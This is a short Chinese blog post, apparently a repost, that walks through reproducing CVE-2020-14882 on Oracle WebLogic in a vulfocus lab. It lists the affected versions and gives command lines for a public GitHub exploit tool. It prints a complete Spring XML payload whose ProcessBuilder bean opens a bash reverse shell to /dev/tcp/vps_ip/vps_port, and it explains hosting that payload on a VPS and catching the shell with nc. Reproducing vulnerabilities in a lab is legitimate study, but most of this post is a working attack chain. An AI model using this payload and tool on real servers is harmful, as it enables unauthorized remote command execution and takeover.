weblogic——CVE_2020_14882漏洞复现

影响版本

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

转自:https://www.cnblogs.com/zzjdbk/p/13971210.html

vulfocus开启环境

在github上下载工具可以直接利用漏洞。

https://github.com/GGyao/CVE-2020-14882_ALL

使用命令 python CVE-2020-14882_ALL.py -u target_ip:port -c "command" 直接利用漏洞执行命令

也可以通过构造一个xml文件后放到vps上,在使用上面的工具利用漏洞使目标访问xml文件后执行xml文件中的命令

工具文件夹下有一个poc.xml也可以用 需要更改cmd

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

<constructor-arg>

<list>

<value>bash</value>

<value>-c</value>

<value><![CDATA[bash -i >& /dev/tcp/vps_ip/vps_port 0>&1]]></value>

</list>

</constructor-arg>

</bean>

</beans>

利用工具执行命令即可获得shell

python CVE-2020-14882_ALL.py -u target -x http://vps_ip/xx.xml

vps开启http服务 python3 -m http.server

nc监听本地端口

posted @   0justin0  阅读(346)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
点击右上角即可分享
微信分享提示